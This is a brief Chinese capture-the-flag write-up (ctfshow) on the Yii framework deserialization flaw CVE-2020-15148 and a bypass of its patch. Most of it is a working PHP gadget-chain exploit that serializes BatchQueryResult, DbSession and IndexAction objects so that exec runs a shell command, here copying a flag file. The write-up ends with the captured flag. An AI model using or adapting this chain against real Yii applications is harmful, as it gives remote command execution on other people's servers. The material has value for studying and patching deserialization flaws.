PHP/7.3.11框架审计CVE-2020-15148Yii登录前补丁绕过
思路类似 web267,估计是打过补丁版本
poc3
<?phpnamespace yii\rest {class Action{public $checkAccess;}class IndexAction{public function __construct($func, $param){$this->checkAccess = $func;$this->id = $param;}}}namespace yii\web {abstract class MultiFieldSession{public $writeCallback;}class DbSession extends MultiFieldSession{public function __construct($func, $param){$this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];}}}namespace yii\db {use yii\base\BaseObject;class BatchQueryResult{private $_dataReader;public function __construct($func, $param){$this->_dataReader = new \yii\web\DbSession($func, $param);}}}namespace {$exp = new \yii\db\BatchQueryResult('exec', 'cp /fla* tari.txt');echo(base64_encode(serialize($exp)));}
flag
ctfshow{f829fe23-e591-4bca-84e1-771dd5b67669}
若有收获,就点个赞吧
0 人点赞
